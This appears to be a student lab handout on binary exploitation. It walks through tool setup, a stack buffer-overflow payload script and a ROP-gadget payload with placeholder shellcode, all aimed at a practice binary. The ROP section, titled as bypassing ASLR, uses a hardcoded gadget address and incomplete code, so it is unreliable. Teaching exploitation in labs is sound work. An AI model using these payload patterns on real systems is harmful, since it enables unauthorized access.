Exploit Development & Binary Exploitation Lab
Overview
This lab focuses on offensive security techniques involving binary exploitation and exploit development. Students will learn how to analyze vulnerable binaries, manipulate memory, and craft custom exploits to gain unauthorized access.
What You Will Learn
- Understanding memory corruption vulnerabilities (buffer overflows, format string exploits, heap exploitation)
- Using debuggers to analyze binary behavior
- Writing custom exploits in Python
- Bypassing security protections like ASLR and DEP
Lab Instructions
1. Setting Up Your Environment
You will need:
- A Debian or Kali Linux VM (VirtualBox, WSL, or cloud-based instance)
- Python3 installed (
sudo apt update && sudo apt install python3
) - Exploitation tools:
gdb
,pwntools
,radare2
,gef
,ROPgadget
Install required tools:
sudo apt install gdb gdb-multiarch python3-pwntools radare2 ropgadget
2. Identifying Vulnerabilities in a Binary
Step 1: Download the vulnerable binary
wget https://example.com/vuln_binary -O vuln_binary
chmod +x vuln_binary
Step 2: Analyze the binary
gdb -q vuln_binary
checksec vuln_binary # Check security protections
run # Execute the binary and observe behavior
3. Exploiting a Buffer Overflow
Step 1: Fuzzing Input to Find Overflow Point
#!/usr/bin/python3
import sys
import struct
offset = 100 # Modify based on test results
payload = b"A" * offset + struct.pack("<I", 0xdeadbeef) # Overwrite return address
sys.stdout.buffer.write(payload)
Save as exploit.py
and run:
python3 exploit.py | ./vuln_binary
4. Bypassing ASLR with ROP Chains
Step 1: Generate a ROP chain
ROPgadget --binary vuln_binary --only "pop|ret"
Step 2: Modify exploit to include ROP gadgets
import struct
pop_ret = struct.pack("<I", 0x08048484) # Example gadget address
shellcode = b"\x90" * 16 + b"..." # Inject shellcode
payload = b"A" * 100 + pop_ret + shellcode
sys.stdout.buffer.write(payload)
Run again:
python3 exploit.py | ./vuln_binary
Final Submission
- Submit a Google Doc with screenshots of your completed tasks.
- Ensure each screenshot has a caption explaining what was accomplished.
- Follow submission guidelines as provided by your instructor.
๐ Congratulations! You’ve completed the Exploit Development & Binary Exploitation Lab! ๐